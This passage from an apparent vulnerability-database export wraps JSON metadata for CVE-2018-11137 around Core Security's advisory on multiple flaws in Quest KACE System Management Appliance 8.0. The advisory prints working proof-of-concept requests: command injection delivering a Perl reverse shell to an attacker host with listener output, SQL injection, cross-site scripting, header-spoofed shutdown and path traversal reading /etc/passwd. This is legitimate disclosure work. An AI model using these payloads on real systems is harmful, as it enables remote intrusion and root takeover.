"id": "CNNVD-201805-1217"
}
]
},
"id": "VAR-201805-0597",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
}
]
},
"last_update_date": "2023-12-18T12:01:57.483000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "QuestKACESystemManagementAppliance path traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137667"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81229"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11137"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.517000",
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"date": "2018-06-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"date": "2018-06-28T13:31:19.123000",
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"date": "2018-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE Systems Management Appliance Path traversal vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
],
"trust": 0.6
}
}
VAR-201805-0601
Vulnerability from variot - Updated: 2023-12-18 12:01The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script in the Quest KACE System Management Virtual Appliance 8.0.318 can be abused to write and delete files respectively via Directory Traversal. Files can be at any location where the 'www' user has write permissions. QuestKACESystemManagementVirtualAppliance is an IT asset management device from QuestSoftware, USA. A path traversal vulnerability exists in QuestKACESystemManagementVirtualAppliance version 8.0.318. An attacker could use the \342\200\230IMAGES_JSON\342\200\231 and \342\200\230attachments_to_remove[]\342\200\231 parameters to write and delete files with this vulnerability. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded).
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
